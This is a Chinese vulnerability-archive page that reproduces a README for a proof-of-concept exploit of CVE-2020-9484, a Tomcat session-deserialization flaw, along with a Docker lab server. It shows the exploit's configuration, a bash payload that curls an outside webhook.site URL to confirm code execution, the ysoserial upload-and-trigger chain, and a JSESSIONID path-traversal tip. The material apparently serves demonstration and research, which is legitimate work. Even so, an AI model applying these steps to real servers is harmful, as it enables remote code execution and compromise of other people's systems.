关联漏洞
标题:
Apache Tomcat 代码问题漏洞
(CVE-2020-9484)
描述:Apache Tomcat是美国阿帕奇(Apache)基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。 Apache Tomcat中存在代码问题漏洞。攻击者可通过控制服务器上文件的内容和名称等方法利用该漏洞执行代码。以下产品及版本受到影响:Apache Tomcat 10.0.0-M1版本至10.0.0-M4版本,9.0.0.0.M1版本至9.0.43之前版本,8.5.0版本至8.5.63之前版本,7.0.0版本至7.0.108之前版本。
描述
PoC exploit for CVE-2020-9484, and a vulnerable web application for its demonstration
介绍
This repository contains a proof of concept exploit for CVE-2020-9484, along with an [example web server](web-application-source/POC_CVE-2020-9484) that is vulnerable to this exploit.
----
### Prerequisites for this vulnerability to be exploitable
Affected tomcat versions are:
- Apache Tomcat 10.x < 10.0.0-M5
- Apache Tomcat 9.x < 9.0.35
- Apache Tomcat 8.x < 8.5.55
- Apache Tomcat 7.x < 7.0.104
1. The `PersistentManager` is enabled and it is using a `FileStore`.
2. The attacker is able to upload a file with arbitrary content, has control over the file name extension (particularly `.session` files), and knows the location where it is uploaded.
3. There are gadgets in the classpath (e.g. `clojure` or `commons-collections`) that can be used for a Java deserialization attack.
----
### The Example Vulnerable Service
The example service is a web server with two pages, `/index.jsp` (or simply `/`) and `/list.jsp`. It allows the user to upload and download files (specific to the current session), effectively acting as file storage.
- It supports POST requests to `/upload` supporting file upload, and allows the user to choose the file name. This makes it possible to upload files with the extension `.session`. It is also known that the server stores the files in the directory `/var/tmp/uploads`.
- It has `PersistentManager` enabled using a `FileStore`. (see `context.xml`)
- It has `clojure:1.8.0` in the classpath thus facilitating deserialization attack. (see `pom.xml`)
----
### [The Exploit](exploit.py)
To set up the example vulnerable service:
```
$ cd sample-vulnerable-server
$ docker build -t vulnerable_tomcat .
$ docker run -p 8085:8080 vulnerable_tomcat
```
The service should now be up and running at `http://localhost:8085/POC_CVE-2020-9484/`.
Now adjust the configuration variables at the beginning of [exploit.py](exploit.py). The `PAYLOAD`, here a shell script, can be any file that can be executed by the server.
```py
UPLOAD_URL = 'http://localhost:8085/POC_CVE-2020-9484/upload' # vulnerable service's file upload endpoint
FILE_UPLOAD_FORM_FIELD = 'file' # as in the upload page's html form
FILE_UPLOAD_BASE_PATH = '/var/tmp/uploads/' # the location where the vulnerable service stores uploaded files on its server
JAVABIN = os.path.expanduser('~/.jdks/corretto-11.0.24/bin/java') # path to java executable, java 11 preferred; yoserial doesn't support newer versions
PAYLOAD = '''\
#!/bin/bash
curl https://webhook.site/4767be3e-f031-4f72-8605-5107d677b1c0/?RCE_SUCCESSFULLY_DEMONSTRATED
'''.encode() # payload for determining whether RCE attempt was successful.
YOSERIAL_PAYLOAD_TYPE = "Clojure" # this must be present in vulnerable server dependencies, for more details see https://github.com/frohoff/ysoserial?tab=readme-ov-file#usage
```
Now run [exploit.py](exploit.py).
It performs the following actions:
1. Downloads [yoserial](https://github.com/frohoff/ysoserial).
2. Uses yoserial to generate malicious serialized objects (as `.session` files), which will eventually get deserialized on the server:
- **chmodPayload.session** to give executable permissions to the `PAYLOAD` file uploaded to the server.
- **executePayload.session** to execute the `PAYLOAD` file on the server.
3. Uploads the `PAYLOAD` as a file to the server.
4. Uploads the `.session` files generated above to the server.
5. Triggers a request to the server with the `JSESSIONID` cookie being the path of the previously uploaded `.sesssion` files relative to the server's session storage, thus triggering their deserialization on the server and subsequent execution of the payload.
----
### Footnotes
- Many servers store user-uploaded files in a path of the form `/path/to/uploads/base/directory/<value of JSESSIONID cookie>/uploads/filename`. In such a case, using a `JSESSIONID` of the form `../../../../tmp` (instead of an arbitrary value like `"1337"*8` used in `exploit.py` above) with the file upload POST request can potentially be helpful in determining where the uploaded file is stored on the server.
文件快照
[4.0K] /data/pocs/6846c82d41fc17e00dc0db83bc5bce55f0bd050a
├── [3.3K] exploit.py
├── [4.0K] README.md
└── [4.0K] sample-vulnerable-server
├── [1.6K] context.xml
├── [ 252] Dockerfile
├── [3.1M] POC_CVE-2020-9484-1.0-SNAPSHOT.war
└── [4.0K] web-application-source
└── [4.0K] POC_CVE-2020-9484
├── [ 10K] mvnw
├── [6.6K] mvnw.cmd
├── [2.0K] pom.xml
└── [4.0K] src
└── [4.0K] main
├── [4.0K] java
│ └── [4.0K] io
│ └── [4.0K] github
│ └── [4.0K] savsch
│ └── [4.0K] poc_cve20209484
│ ├── [ 196] Config.java
│ ├── [1.2K] DownloadServlet.java
│ ├── [ 710] HelloServlet.java
│ └── [1.5K] UploadServlet.java
└── [4.0K] webapp
├── [ 495] index.jsp
├── [1.0K] list.jsp
└── [4.0K] WEB-INF
└── [ 304] web.xml
12 directories, 15 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。